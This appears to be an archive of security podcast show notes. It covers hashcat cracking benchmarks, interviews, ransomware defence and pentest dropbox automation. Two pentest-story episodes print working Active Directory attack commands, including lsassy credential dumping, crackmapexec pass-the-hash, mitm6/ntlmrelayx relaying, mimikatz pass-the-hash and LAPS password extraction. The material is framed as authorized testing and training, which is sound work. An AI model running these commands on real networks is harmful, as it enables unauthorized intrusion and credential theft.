v10.8+ (PBKDF2-SHA512) (Iterations: 1023) Speed.#1.........: 1002.4 kH/s (78.60ms) @ Accel:32 Loops:31 Thr:1024 Vec:1 Speed.#2.........: 1002.4 kH/s (78.60ms) @ Accel:32 Loops:31 Thr:1024 Vec:1 Speed.#3.........: 1002.1 kH/s (78.62ms) @ Accel:32 Loops:31 Thr:1024 Vec:1 Speed.#4.........: 1002.7 kH/s (78.58ms) @ Accel:32 Loops:31 Thr:1024 Vec:1 Speed.#*.........: 4009.6 kH/s Hashmode: 11600 - 7-Zip (Iterations: 16384) Speed.#1.........: 897.6 kH/s (82.05ms) @ Accel:4 Loops:4096 Thr:1024 Vec:1 Speed.#2.........: 896.4 kH/s (82.09ms) @ Accel:4 Loops:4096 Thr:1024 Vec:1 Speed.#3.........: 893.3 kH/s (83.60ms) @ Accel:4 Loops:4096 Thr:1024 Vec:1 Speed.#4.........: 912.4 kH/s (81.95ms) @ Accel:4 Loops:4096 Thr:1024 Vec:1 Speed.#*.........: 3599.7 kH/s Hashmode: 12500 - RAR3-hp (Iterations: 262144) Speed.#1.........: 116.6 kH/s (60.91ms) @ Accel:16 Loops:16384 Thr:128 Vec:1 Speed.#2.........: 111.4 kH/s (63.61ms) @ Accel:16 Loops:16384 Thr:128 Vec:1 Speed.#3.........: 111.6 kH/s (63.63ms) @ Accel:16 Loops:16384 Thr:128 Vec:1 Speed.#4.........: 115.0 kH/s (61.81ms) @ Accel:16 Loops:16384 Thr:128 Vec:1 Speed.#*.........: 454.7 kH/s Hashmode: 13000 - RAR5 (Iterations: 32799) Speed.#1.........: 93248 H/s (54.69ms) @ Accel:16 Loops:128 Thr:1024 Vec:1 Speed.#2.........: 93202 H/s (54.72ms) @ Accel:16 Loops:128 Thr:1024 Vec:1 Speed.#3.........: 93009 H/s (54.70ms) @ Accel:16 Loops:128 Thr:1024 Vec:1 Speed.#4.........: 93241 H/s (54.69ms) @ Accel:16 Loops:128 Thr:1024 Vec:1 Speed.#*.........: 372.7 kH/s Hashmode: 6211 - TrueCrypt RIPEMD160 + XTS 512 bit (Iterations: 1999) Speed.#1.........: 672.2 kH/s (55.34ms) @ Accel:16 Loops:64 Thr:1024 Vec:1 Speed.#2.........: 672.1 kH/s (55.34ms) @ Accel:16 Loops:64 Thr:1024 Vec:1 Speed.#3.........: 671.4 kH/s (55.34ms) @ Accel:16 Loops:64 Thr:1024 Vec:1 Speed.#4.........: 672.2 kH/s (55.34ms) @ Accel:16 Loops:64 Thr:1024 Vec:1 Speed.#*.........: 2687.9 kH/s Hashmode: 13400 - KeePass 1 (AES/Twofish) and KeePass 2 (AES) (Iterations: 24569) Speed.#1.........: 111.2 kH/s (122.52ms) @ Accel:32 Loops:128 Thr:1024 Vec:1 Speed.#2.........: 111.1 kH/s (122.55ms) @ Accel:32 Loops:128 Thr:1024 Vec:1 Speed.#3.........: 111.2 kH/s (122.58ms) @ Accel:32 Loops:128 Thr:1024 Vec:1 Speed.#4.........: 111.2 kH/s (122.52ms) @ Accel:32 Loops:128 Thr:1024 Vec:1 Speed.#*.........: 444.7 kH/s Hashmode: 6800 - LastPass + LastPass sniffed (Iterations: 499) Speed.#1.........: 5944.3 kH/s (35.66ms) @ Accel:8 Loops:249 Thr:1024 Vec:1 Speed.#2.........: 5942.0 kH/s (35.66ms) @ Accel:8 Loops:249 Thr:1024 Vec:1 Speed.#3.........: 5939.0 kH/s (35.67ms) @ Accel:8 Loops:249 Thr:1024 Vec:1 Speed.#4.........: 5943.8 kH/s (35.66ms) @ Accel:8 Loops:249 Thr:1024 Vec:1 Speed.#*.........: 23769.0 kH/s Hashmode: 11300 - Bitcoin/Litecoin wallet.dat (Iterations: 200459) Speed.#1.........: 11370 H/s (73.48ms) @ Accel:2 Loops:1024 Thr:1024 Vec:1 Speed.#2.........: 11355 H/s (73.50ms) @ Accel:2 Loops:1024 Thr:1024 Vec:1 Speed.#3.........: 11369 H/s (73.49ms) @ Accel:2 Loops:1024 Thr:1024 Vec:1 Speed.#4.........: 11370 H/s (73.49ms) @ Accel:2 Loops:1024 Thr:1024 Vec:1 Speed.#*.........: 45464 H/s

For a real world example, I had ~1,500 NTLM hashes to crack that I ran through some of the hatecrack methodology, and here's how the instance performed:

100 LM hashes discovered, all cracked in 7 minutes (heh, 7 minutes :-)
Ran hatecrack's quick crackw ith no rules: done in 7 minutes, cracked 108 accounts
Quick crack against one rule to rule them all: ran in 25 minutes, got got 271 new passwords
Ran extensive hatecrack methodology, it ran for a little over 2 hours and got 88 new passwords.

All said and done, about 1/3 of the passwords cracked in about 3 hours. Not bad!

Don't forget, the second you're done with your cracking efforts, SHUT THE BOX DOWN! Otherwise you're in for a sour surprise come AWS billing day :-(

On a few personal notes:

Last Comic Standing was the show I couldn't think of during the episode :-)
After a toxic non-toxic foam pit incident a few years ago, my family and I had another injury this weekend with a rented waterslide - the fun ended in a concussion!

7MS #473: Interview with Nikhil Mittal Jun 24, 2021

Hey everybody! Today Joe and I sat down with Nikhil Mittal of Pentester Academy and Altered Security to talk about a whole slew of fun security topics:

How Nikhil first got involved in Pentester Academy
Nikhil's hacker origin story
How does Nikhil feel about his tools being used by baddies?
What security tools/defenses would be good for SMBs to focus on?
Active Directory security - is all hope lost?
Will AI, ML, Terminator robots, etc. replace all of us who do pentesting for a living?

7MS #473: Interview with Nikhil Mittal Jun 24, 2021

Hey everybody! Today Joe and I sat down with Nikhil Mittal of Pentester Academy and Altered Security to talk about a whole slew of fun security topics:

How Nikhil first got involved in Pentester Academy
Nikhil's hacker origin story
How does Nikhil feel about his tools being used by baddies?
What security tools/defenses would be good for SMBs to focus on?
Active Directory security - is all hope lost?
Will AI, ML, Terminator robots, etc. replace all of us who do pentesting for a living?

7MS #472: Interview with Christopher Fielder Jun 16, 2021

Today our good pal Christopher Fielder from Arctic Wolf is back for an interview three-peat! He joins Joe "The Machine" Skeen (a.k.a. Gh0sthax) and I to talk about all things ransomware, including:

How the Colonial Pipeline incident may have started from a weak VPN cred with no MFA. Silver lining (?) - they got some of the $ back.
Was the federal government's response good enough? What should the government be doing to better handle and manage ransomware?
- Common ways ransomware gets in our environments, and some ways to NOT get ransomware'd:
  - Use 2FA (make sure that all accounts are using it!)
  - Consider having (if possible) your AD user scheme be something like chi-user4920394 instead of Joe.President
  - Have users that haven't logged in for X days get automatically locked out
  - Train your users - consider Arctic Wolf's managed security awareness offering
  - Detect early signs of compromise like Kerberoasting
  - Lock down your DNS egress to only specific servers so that it doesn't run "wide open"
  - Leverage good threat intel

7MS #471: Cyber News - Ransomware Should Run Somewhere Edition Jun 09, 2021

Hey everybody, happy June! Our pal Joe is back to cover some great security stories with us, including:

Peloton's leaky API
Some Colonial Pipeline discussion (story 1, story 2)
Amazon Sidewalk doesn't really share your Internet connection with neighbors/strangers. The Hacker News article doesn't do an awesome job of clearing that up either.

7MS #470: First Impressions of Meraki Networking Gear Jun 02, 2021

Today we're doing something new - a first impressions episode of Meraki networking gear. Note: this is not a sponsored episode, but rather a follow up to episode #460 where I talked about throwing all my UniFi gear into the ocean and replacing it with Meraki gear. At the end of that episode I asked if anybody was interested in a "first impressions" of the gear, and it turns out (at least 6) people are interested, so here we are! TLDL:

Pros

Super easy plug-and-play setup
The mobile app can control just about everything - ports, SSIDs, Internet on/off timers and more!
Verbose logging
Top-notch support from experienced technicians

Cons

Cost! Big $$$
"Cloud only" - can't install this gear in a LAN-only configuration
Client VPN is a bit clunky to setup

7MS #469: Interview with Philippe Humeau of CrowdSec May 26, 2021

Hey friends! Today we're talking with Philippe Humeau, CEO of CrowdSec, which is "an open-source massively multiplayer firewall able to analyze visitor behavior & provide an adapted response to all kinds of attacks. It also leverages the crowd power to generate a global IP reputation database to protect the user network."

I came into this interview not knowing much at all about CrowdSec, so I peppered Philippe with questions such as:

What is CrowdSec?
What problem does it solve?
Who are your competitors?
You're open source...so how do you make $? What's your five-year plan?
You're dealing with a lot of data and metrics...how are you handling data privacy laws and concerns such as GDPR?
What if I fall in love with CrowdSec and want to contribute to making it better?

It was a really fun, transparent and energetic interview - hope you enjoy it!

7MS #468: Eating the Security Dog Food - Part 3 May 20, 2021

Today we continue the series on eating your own security dog food! Specifically, we talk about:

Keeping a log and procedure for sanitizing systems
Keeping a log and procedure for provisioning systems
A big "gotcha" to be aware of when using Windows system dropboxes - make sure your Windows user account doesn't expire, because Splashtop doesn't have any way to update it! To prevent this, set the account not to expire:

wmic useraccount where "Name='LocalAdminAccount'" set PasswordExpires=false

If you want more tips on building pentest dropboxes, check out this series

Oh, and today's song that I sang obnoxiously is If I Were a Dog.

7MS #467: How to Succeed in Business Without Really Crying - Part 9 May 12, 2021

Hey everybody! I stayed in a hotel for the first time in over a year and boy oh boy...I hope I didn't get COVID from the bedsheets!

Anyhow, on that journey I thought of some things that I think will help your business on the marketing/project management/sales side to be more successful and less annoying. DISCLAIMER: I have no formal training in these areas, but I've been on both sides of the table for a number of years, and I think I'm getting a better idea of what clients do and don't like during the sales process. These things include:

Reduce layers of people complexity - don't have 17 of your people on the client intro/pitch call and then ghost them once they actually want to buy something!
Keep project management just complicated enough - I like project management tools and spreadsheet task-trackers like Smartsheet but I'm trying to let the client lead as far as how much detail they need when tracking their projects. By default, we create a document with a high level map of project milestones, timelines and key contact information. We update that as often as the client likes.
Personalize responses to Web leads - if you have an info@ or sales@ address for your business, I think you should personalize the response you give folks who write in. They wrote you for a reason! Don't just copy/paste some generic "Hey you wanted info about our company so here it is blah blah blah" response, that doesn't make people feel like you give a rip about their needs. Think of something personal to say in the reply. "Oh, I see you're in Minnesota. I'm a big Twins fan!" Something like that. Simple, easy and personal.
Don't sign people up for junk without asking - in this episode I give an example of a vendor we looked at (but didn't select) for some services, and the company decided to automatically sign ups up for a bunch of electronic and paper mailings. That's super annoying!
Don't stink at LinkedIn - in the last episode of this series, I told you about a guy who (to me) wins LinkedIn and the Internet because he sent me a personalized video LinkedIn invitation - it was awesome! Be more like that guy, and less like the mosquitoes who send invites like "Hi, I noticed you're human and figured we should be LinkedIn BFFs" and then sign you up for a non-stop barrage of sales pitches!
Bug people "just enough" - if you've had an awesome scoping call for a potential project and the client has received and reviewed the SOW, stay in touch with them periodically - even if it feels like you're being ghosted.

7MS #466: Attacking and Defending Azure AD Cloud (CARTP) May 05, 2021

Welp, I need another security certification like I needed a bunch to the retinas, but even after all the fun (and pain) of CRTP I couldn't help but sign up for the maiden voyage of Attacking and Defending Azure AD Cloud - a.k.a. CARTP. This cert comes to us from our friends over at Pentester Academy, and is all about pwning things in Azure AD which is mostly new ground for me.

I this episode I talk about some of the TTPs covered in week 1 of this course, as well as:

Likes:

Courses offered on Saturday (I'm usually pooped for these sessions, but it's easier than taking time during the work week)
Student portal - and especially the student guide! - is more polished, easy to read, and easy to copy/paste from.

Dislikes:

On Saturdays I'm a sleepy Brian. :-)
I still wish the course was designed such that we would go through various hands-on-keyboard exercises with the instructor, not just watch.
Use of Discord as main comms channel - it causes anxiety for me...too many blips and bloops and blurps with all the notifications. It's also frustrating that the instructor takes questions from Discord sometimes without repeating the question, thus making it hard to figure out what everybody was talking about if I watch the Zoom reply.

7MS #465: Cyber News - The FBI Might Be Getting Into the IR Biz Edition Apr 28, 2021

Hey friends! Today Joe "The Machine" Skeen (a.k.a. Gh0sthax) and I talk about some of our favorite news stories, including:

FBI removes hacker back doors
NSA: 5 security bugs under active nation-state cyberattack
Ubiquiti is accused of covering up a ‘catastrophic’ data breach — and it’s not denying it. On a side note, enjoy our podcast about how we lost our love for Ubiquiti a while back: 7MS #460: Why I'm Throwing My UniFi Gear Into the Ocean
Codecov users warned after backdoor discovered in devops tool

7MS #464: Interview with Christopher Fielder of Arctic Wolf Apr 22, 2021

Today our friend Christopher Fielder of Arctic Wolf joins us on the show again (check out his first appearance in episode #444 - this time to talk about the security journey, and how to start out in your "security diapers" and mature towards a stronger infosec program. Specifically, we talk about:

When the company has one person in charge of IT/security, how can you start taking security seriously without burning this person out? First, it's probably a good idea to take note of what you have as far as people, tools and technology to help you meet your security goals.
Early in this process, you should inventory what you have (see CIS controls) so you know what you need to protect. A few tools to help you get started:
- Nmap
- Rumble
- LanSweeper
- Witnessme
As you go about any phase of your security journey, don't ever think "I'm good, I'm secure!"
Quarterly/yearly vulnerability scans just won't cut it in today's threat landscape - especially your external network. Consider scanning it nightly to catch show-stoppers like Hafnium early)
Limiting administrative privileges is SUPER important - but don't take our word for it, check out this report from Beyond Trust for some important stats like "...enforcing least privilege and removing admin rights eliminates 56% of critical Microsoft vulnerabilities."
Install LAPS, because if an attacker gets local admin access everywhere, that's in many ways just as good as Domain Admin!
Train your users on relevant security topics. Then train them again. Then....again. And after that? Again.
There are many ways to conduct tabletop exercises. They don't have to be crazy technical. Start with the internal tech teams, practice some scenarios and get everybody loosened up. Then add the executives to those meetings so that everybody is more at ease.
How do you know when it's time to ask for help from an outside security resource?
Not sure what kind of shape your company's security posture is in? Check out Arctic Wolf's free security maturity assessment.

7MS #463: DIY Pentest Dropbox Tips - Part 5 Apr 14, 2021

In the last two episodes of this series (#449 and #450) we've been diving into how to not only speed up the process of spinning up a DIY pentest dropbox, but how to automate nearly the entire build process!

In today's episode we talk specifically about how to streamline the Windows 10 build process. As previously mentioned, this article is awesome for creating a core Win 10 answer file that will format C:, setup a local admin, login once to the configured desktop and then do whatever things you want it to do. Personally, I like having a single batch file get fired off that:

Sets the timezone with tzutil /s "Central Standard Time"
Stops the VM from falling asleep with powercfg.exe -change -standby-timeout-ac 0
Grabs and runs a PS file that does a ton of downloading and unzipping of files with:

invoke-webrequest https://somesite/somefile.zip -outfile c:\somewhere\somefile.zip expand-archive c:\somewhere\somefile.zip -destinationpath "c:\somewhere\extracted\"

Installs Windows updates with:

Install-PackageProvider -name nuget -force Install-Module PSWindowsUpdate -force Import-Module PSWindowsUpdate Get-WindowsUpdate Install-WindowsUpdate -AcceptAll -IgnoreReboot

Sets a new name for the machine:

Write-Host "Picking a new name for this machine...you'll need to provide your admin pw to do so" Rename-Computer -LocalCredential administrator -PassThru Write-Host "New name accepted!"

Does a set of actions depending on the IP range with this code (which sets the IP address to a variable and then does stuff if the machine sits in that subnet):

$ip = ((ipconfig | findstr [0-9].\.)[0]).Split()[-1] f ($ip -like "192.168.0.*") { Invoke-Webrequest https://somesite/somefile.ps1 -OutFile c:\someplace\somefile.ps1 }

Also, I talk in this episode about how I try to host these "seed" files as securely as possible using Amazon Lightsail instances, the built-in firewall, and LetsEncrypt.

7MS #462: Pentesting with the Hak5 Key Croc Apr 07, 2021

Today we talk through our first engagement using Hak5 Key Croc to steal and exfil data. In the past, my internal monologue when a new Hak5 toy is released sounds like this:

"I certainly don't need another Hak5 doo-dad! The last one didn't ever work that great, and ended up in a drawer full of past Hak5 doo-dads that didn't work that great."
"Whaaaaat? A new cool and hip video for the INSERT_CATCHY_HAK5_TOOL_NAME is out? Pffft. I don't need that."

5 seconds go by...

"Well it's just $100, shut up and take my money!"
"It came in the mail today! It has a cool envelope and everything!"
"Hrm, I followed the quick start video and 3 of the 10 steps don't work for me. I'll hit the forums. Huh, everybody seems to be having this problem.

5 days go by...

"Neat! With a little help from SassyGal67 and StarWarsFreak_XXL on the forums, I hacked together my own fix for these issues. Now the core functionality of the device works, but the GUI is totally broken and you have to factory reset it with every use. Cool!"

Deep breath. Tosses doo-dad in a drawer full of past Hak5 doo-dads that didn't work that great.

So with all that said, was our experience with the Key Croc any different? Check out today's episode to find out!

7MS #461: Tales of Internal Network Pentest Pwnage - Part 26 Mar 31, 2021

OK I probably say this every time, but I'm gonna say it again: this tale of pwnage is my one of my favs - and not because of the tools/tradecraft, but because of why the company needed our help in the first place. I think I'd file this under the category of "rescue and recovery mission" more than a pentest, but it was a total blast.

I also cover a few tangents, including how COVID shot #2 gave me nightmares about leprechauns and indirectly caused me to de-pants in front of a large Webinar audience.

7MS #460: Why I'm Throwing My UniFi Gear Into the Ocean Mar 24, 2021

Hey friends! Warning: this is not a "typical" 7MS episode where we try hard to deliver some level of security value.

Instead, today is a big, fat, crybaby, first-world problems whine-fest about how I used to love my UniFi gear for many years, but then a few weeks ago I hit unhealthy levels of rage while working with it...and subsequently completely ripped it all out of the wall and threw it in a plastic bin.

Let me say it one more time: if you don't like rants of rage, skip this episode and we'll see you next week!. If you want to hang in for this clown show, you'll be treated to some of the following highlights:

How I did not pirate Boson NetSim
How I fell in love with the Edge Router X as an up-and-coming network guru
The schedule isn't up, but I'm speaking at Secure360 this year!
My shiny new Dream Machine had a really fun issue where one morning Internet service was dead (even though config hadn't changed in weeks), and restoring the SAME config over the RUNNING config fixed the issue. Whaaahhhh?
The Dream Machine GUI (at the time) doesn't have all the options one might need to stand up a site to site VPN. Neat.
After a firmware update, my wifi started going down from 8:00 a.m. - 8:07 a.m. every morning. Were one of you hacking me? WERE ONE OF YOU HACKING ME!
Once I got a BeaconHD, I got a new fun issue where if you were connected to it and submitted a wifi voucher, the Beacon wouldn't properly recognize it and let you on the Internet until about 5 minutes later. Guests loved that! And by "loved that" I mean "hated that."
After upgrading UDM firmware again, a new nifty issue popped its head up which broke all my inter-VLAN rules. Yay!
I threw hundreds of dollars at new UniFi switches and access points to solve all these problems, and everything worked perfectly (until it didn't).

7MS #459: Cyber News - Microsoft Exchange Makes the World Cry Edition Mar 17, 2021

Happy mid-March! Our good pal Gh0sthax joins us today for another hot dish of cyber news! Stories include:

Microsoft Exchange cyber attack - Hacker News has a nice what we know so far story, but things have evolved really fast, so make sure you check Microsoft's primary advisory, the script to run on local servers and newer updates such as the recent one-click remediation for unsupported Exchange versions
SonicWall zero day - yuck, looks like the SonicWall troubles we talked about recently were a true zero day. In contrast to the Exchange story, it looks like SonicWall's official response offers (frighteningly?) little by way of logs and forensics to tell if you were truly popped. Either way, be sure to patch!
Hackers attempt to contaminate Florida town's water supply - the story itself is interesting, but the way it got picked up by some outlets seems to send the message of "TeamViewer = bad" but we think the true lessons learned here are:
- Out of date and/or unsupported OS = bad
- Weak credentials = bad
- Connecting this type of equipment directly to the Internet instead of MFA + VPN = bad

CISA has a great breakdown of this incident as well.

Webshell use has doubled since last year - this article brings back some happy/frustrating OSCP experiences. To better protect your org from being pwned with Web shells, check out NSA's list of vulnerabilities commonly exploited to plant web shells
Some great feedback from the last cyber news episode - a podcast listener offered a different take on the "sudo bug that gives root access story" that we discussed last month.

7MS #458: Interview with Tanya Janca Mar 11, 2021

Today we're super excited to share a featured interview with Tanya Janca of WeHackPurple!

Tanya has been in software development from the moment she was of legal age to work in Canada - beginning by working with some huge companies (Nokia/Adobe) before falling in love with application security and eventually starting a company of her own. Gh0sthax and I sat down with Tanya over Zoom to discuss:

How to overcome your fears and present at conferences, write blog posts and even start your own company!
How to deal with online jackwagons who troll you online at conferences
The importance of finding a mentor and mentoring others

Also, here are a bunch of handy links and hashtags Tanya shares throughout the interview:

Bob and Alice Learn Application Security - Tanya's book, available on Amazon
Women of Security (WoSEC)
We Hack Purple Podcast - weekly podcast with a diverse range of guests from all walks of infosec life
We Hack Purple Community - "a Canadian company dedicated to helping anyone and everyone create secure software."
Tanya's music on Spotify
#CyberMentoringMonday - a hashtag that Tanya and other security professionals monitor to help people connect with cyber mentors
InsiderPHd - has a safe space for bug bounty hunters to learn and collaborate
WeAreHackerz - "You are welcome to join WeAreHackerz if you identify as a person of a marginalized gender, including but not limited to non-binary individuals, women (trans and cis), trans men, genderqueer, etc. We welcome members across all nationalities, races, religions, ages, or other characteristics that make each of us unique."
Security in Color

7MS #457: Tales of Internal Network Pentest Pwnage - Part 25 Mar 04, 2021

Hi! This episode of pentest pwnage is a fun one because it was built for speeeeeeeeeeeeeeeed. Here's some of the things we're doing/running when time is of the essence:

Get a cmd.exe spun up in the context of your AD user account:

runas /netonly /user:samplecompany\billybob "C:\windows\system32\cmd.exe"

Then get some important info in PowerView:

Get-DomainUser -PreAuthNotRequired - find AD users with this flag set...then crack the hash for a (potentially) easy win!
Get-NetUser -spn - find Kerberoastable accounts...then crack the hash for a (potentially) easy win!
Find-LocalAdminAccess -Verbose helps you find where your general AD user has local admin access!

Once you know where you have local admin access, lsassy is your friend:

lsassy -d domain.com -u YOUR-USER -p YOUR-PASSWORD victim-server

Did you get an admin's NTLM hash from this dump? Then do this:

crackmapexec smb IP.OF.THE.DOMAINCONTROLLER -u ACCOUNT-YOU-DUMPED -H 'NTLM-HASH-OF-THAT-ACCOUNT-YOU-DUMPED

(Pwn3d!) FTW!

7MS #456: Certified Red Team Professional - Part 4 Feb 25, 2021

Hello friends! Today, Joe (Gh0sthax) and I complete our series on CRTP - Certified Red Team Professional - a really awesome pentesting training and exam based squarely on Microsoft tools and tradecraft. Specifically, Joe and I talk about:

We don't think the training/exam is for beginners, despite how its advertised
Both the lab PDF and PowerPoint have their own quirks - which may ultimately be teaching us not to be copy-and-paste jockeys, and instead build our own study guides and cheat sheets
Don't let the training give you the idea that most pentests have a super fast escalation path to DA (ok yes sometimes they do, but usually we spend a LOT of hours working on escalation!)
Watch the walkthrough videos. We repeat: WATCH THE WALKTHROUGH VIDEOS!
Although not required, we highly recommend capturing all the flags laid out for you in the lab environment
Know how to privesc - using multiple tools/methods
It would be to your advantage to understand how to view/manipulate Active directory information in multiple ways
You start the exam with no tools. So how will you be ready to upload/download tools into the exam environment so you make the most of your exam time?
Tool X might give you wrong results - or none at all - in the lab. Do you have a backup tool Y and Z that can serve the same purpose?
You want to be very good at Kerberos ticket crafting!
Know all the mimikatz commands and switches and when to apply them

7MS #455: Tales of Internal Network Pentest Pwnage - Part 24 Feb 19, 2021

Hey everybody! Sorry that we're late again with today's episode, but I got COVID shot #2 and it kicked my behind BIG TIME today. But I'm vertical today and back amongst the living and thrilled to be sharing with you another tale of pentest pwnage! Yeah! This might be my favorite tale yet because:

I got to use some of my new CRTP skills!
Make sure on your pentests that you're looking for "roastable" users. Harmj0y has a great article on this, but the TLDR is make sure you run PowerView with the -PreauthNotRequired flag to hunt for these users:

Get-DomainUser -PreauthNotRequired

Check for misconfigured LAPS installs with Get-LAPSPasswords!
The combination of mitm6.py -i eth0 -d company.local --no-ra --ignore-nofqdn + ntlmrelayx -t ldaps://domain.controller.ip.address -wh attacker-wpad --delegate-access is reeeeeealllllyyyyyyy awesome and effective!
When you are doing the --delegate-access trick, don't ignore (like I did for years) if you get administrative impersonation access on a regular workstation. You can still abuse it by impersonating an admin, run secretsdump or pilfer the machine for additional goodies!
SharpShares is a cool way to find shares your account has access to.
I didn't get to use it on this engagement but Chisel looks to be a rad way to tunnel information
Once you've dumped all the domain hashes with secretsdump, don't forget (like me) that you can do some nice Mimikatz'ing to leverage those hashes! For example:

sekurlsa::pth /user:administrator /ntlm:hash-of-the-administrator-user /domain:yourdomain.com

Do that and bam! a new command prompt opens with administrator privileges! Keep in mind though, if you do a whoami you will still be SOMEWORKSTATION\joeblo, but you can do something like psexec \\VICTIM-SERVER cmd.exe and then do a whoami and then POW! - you're running as domain admin!

Once you've got domain admin access, why not run Get-LAPSPasswords again to get all the local admin passwords across the whole enterprise? Or you can do get-netcomputer VICTIM-SERVER and look for the mc-mcs-admpwd value - which is the LAPS password! Whooee!!! That's fun!
Armed with all the local admin passwords, I was able to run net use Q: \\VICTIM-SERVER\C$" /user:Adminisrator LAPS-PASSWORD to hook a network drive to that share. You can also do net view \\VICTIM-SERVER\ to see all the shares you can hook to. And that gave me all the info I needed to find the company's crowned jewels :-)

7MS #454: Cyber News - Lets Switch to Typewriters Edition Feb 11, 2021

Happy almost-mid-February! Today Gh0sthax cooked up some great news stories for us to chew on, including:

Sudo bug gives root access to mass numbers of Linux systems!
What the heck is hammering with GameStop stock? - this tweet does a great job of explaining it in plain English
Solarwinds continues to be a gift that keeps on giving malware-laced gifts that people don't want
Sonicwall was hacked using zero days in its own products. After recording this news segment, Sonicwall issued an updated statement on the situation

7MS #453: Interview with Marcello Salvati Feb 04, 2021

Today's featured interview is with Marcello Salvati of Black Hills Information Security. Marcello is a.k.a. byt3bl33d3r, and known for his many contributions to the security community. We here at 7MS first became familiar with his work after using CrackMapExec on our penetration tests, and today we sat down with Marcello to discuss:

Brian's Chris Farley moment with Marcello
Marcello's infosec origin story
CrackMapExec, how it came to be, how it was named, and what's coming in the new version of CME
Marcello's decision to create Porchetta Industries as a community to provide "support to open source infosec/hacking tool developers and helps them succeed with their own Github sponsorships." Marcello welcomes you to follow Porchetta Industries on Twitter and Discord.
What does Marcello do when he's not pentesting and coding? And does he ever get tired of pentesting and coding?
What the heck is Nim and why is Marcello so excited about OffensiveNim?

7MS #452: Enterprise Attacker Emulation and C2 Implant Development Jan 28, 2021

Hey everyone! Hope you're having a great week. Today Gh0sthax and I do a brain dump and recap of a cool (and mind-exploding) course we took last week called Enterprise Attacker Emulation and C2 Implant Development. In the tangent department, we also touch a bit on:

The Fargo TV series
Our upcoming interview with Marcello (a.k.a. byt3bl33d3r) from BHIS
This Key and Peele sketch
I just took my CRTP exam, which we've talked about a lot in the past
7MS is trying to up its pentest game by learning how to write beacons/implants. One project that's really cool in this respect is from MrUn1k0d3r

7MS #451: Deep Freeze Jan 22, 2021

Today we talk about a cool product called Deep Freeze, which, as its name implies, can "freeze" your computer in a known/good/frozen state. Then you can do whatever the flip you want to the machine (install icky things, tamper with C:\windows, pack your browser full of shady plugins, and more!), and then just reboot to restore!

Note: this is not a sponsored episode, but will probably sound like one because I really dig this product and think you might too :-)

7MS #450: DIY Pentest Dropbox Tips - part 4 Jan 15, 2021

Hey friends! We're continuing our series on pentest dropbox building - specifically playing off last week's episode where we started talking about automating the OS builds that go on our dropboxes. Today we'll zoom in a little closer and talk about some of the specific scripting we do to get a Windows 2019 Active Directory Domain Controller installed and updated so that it's ready to electronically punch in the face with some of your mad pentesting skills! Specifically, we talk about these awesome commands:

tzutil /s "Central Standard Time" - this is handy to set the time zone of your server build

powercfg.exe -change -standby-timeout-ac 0 will stop your VM from falling asleep

Invoke-WebRequest "https://somesite/somefile.file" -OutFile "c:\some\path\somefile.file" is awesome for quickly downloading files you need. Couple it with Expand-Archive "C:\some\path\some.zip" "c:\path\to\where\you\want\to\extract\the\zip" to make auto-provisioning your toolkit even faster!

Don't like it that Server Manager loves to rear its dumb head upon every login? Kill the task for it with Get-ScheduledTask -TaskName ServerManager | Disable-ScheduledTask -Verbose. Byeeeeee!!!!

I love Chrome more than I love IE/Edge, so I auto install it with:

$Path = $env:TEMP; $Installer = "chrome_installer.exe"; Invoke-WebRequest "http://dl.google.com/chrome/install/375.126/chrome_installer.exe" -OutFile $Path\$Installer; Start-Process -FilePath $Path\$Installer -Args "/silent /install" -Verb RunAs -Wait; Remove-Item $Path\$Installer

Now get all the Windows updates!

Install-PackageProvider -name nuget -force Install-Module PSWindowsUpdate -force Import-Module PSWindowsUpdate Get-WindowsUpdate Install-WindowsUpdate -AcceptAll -IgnoreReboot

Then rename your machine:

Write-Host "Picking a new name for this machine...you'll need to provide your admin pw to do so" Rename-Computer -LocalCredential administrator -PassThru Write-Host "New name accepted!"

When you're ready to install Active Directory, you can grab the RSAT tools:

Write-Host "Lets install the RSAT tooleeeage!" add-windowsfeature -name rsat-adds

And then the AD domain services themselves:

Write-Host "Now lets install the AD domain services!" add-windowsfeature ad-domain-services

Then install the new forest:

install-addsforest -domainname your.domain -installdns -DomainNetbiosName yourdomain

7MS #449: DIY Pentest Dropbox Tips - Part 3 Jan 07, 2021

Happy new year! This episode continues our series on DIY pentest dropboxes with a focus on automation - specifically as it relates to automating the build of Windows 10, Windows Server 2019, Kali and Ubuntu VMs. Here's the resources I talk about in more detail on today's episode that helps make the automagic happen:

Windows VMs This article from Windowscentral.com does a great job of walking you through building a Windows 10 unattended install. A key piece of the automation is the autounattend.xml file, which you can somewhat automatically build here, but I think you'll want to install the Windows System Image Manager to really get in the tech weeds and fully tweak that answer file. The handy AnyBurn utility will help you make ISOs out of your Windows 10 / Server 2019 customized builds.

Ubuntu VMs I set out to build a Ubuntu 18.x box because Splashtop only supports a few Linux builds. I found a freakin' sweet project called Linux unattended installation that helps you build the preseed.cfg file (kind of like the Windows equivalent of an answer file). The area of preseed.cfg I've been spending hours dorking around with is:

d-i preseed/late_command string \

Under this section you can customize things to your heart's content. For example, you could automatically pull down and install all OS packages/updates and a bunch of third party utils you want:

in-target sh -c 'apt-get update'; \ in-target sh -c 'apt-get upgrade -y'; \ in-target sh -c 'apt-get install curl dnsrecon git net-tools nmap openssh-server open-vm-tools-desktop python3.8 python3-pip python-libpcap ubuntu-gnome-desktop unzip wget xsltproc -y'; \

Finally, the project provides a slick script that will wrap up your Ubuntu build plus an SSH key into a ready-to-go ISO:

build-iso.sh ~/.ssh/id_rsa.pub ~/Desktop/My-kool-kustomized-Ubuntu.iso

Awesome!

Kali VMs There is some decent documentation on building a preseed.cfg file for Kali. But the best resource I found with some excellent prebuilt config file is this kali-preseed project.

Once your seed file is built, it's super easy to simply host it on a machine in your network and let Kali pull it during install. For example, if you've got a Linux box with Python on the network at 192.168.0.7, just make a temporary folder with the preseed.cfg file in it and then run:

sudo python3 -m http.server 80

Then, in your virtual environment, create a new VM and boot it to a Kali NetInstaller image. At the splash screen, hit Tab and it'll display a command line you can edit. Remove the line that says something like preseed/file=/cdrom/simple-cdd/default.preseed, add auto=true and then the URL path to your preseed file, such as url=http://192.168.0.7/preseed.cfg. The Kali will ask for a few questions, such as a username and hostname to configure, and then if you're watching your machine hosting preseed.cfg, you'll see your Kali machine grab the config file and take care of the rest from there!

Got a better/cooler/funner/faster/awesomer way to do this type of automation? Let us know!

7MS #448: Certified Red Team Professional - Part 3 Dec 30, 2020

Today, Gh0sthax and I talk about week 3/4 of the CRTP - Certified Red Team Professional training, and how it's kicking our butts a bit. Key points include:

We agree this is not a certification for folks who are new to pentesting
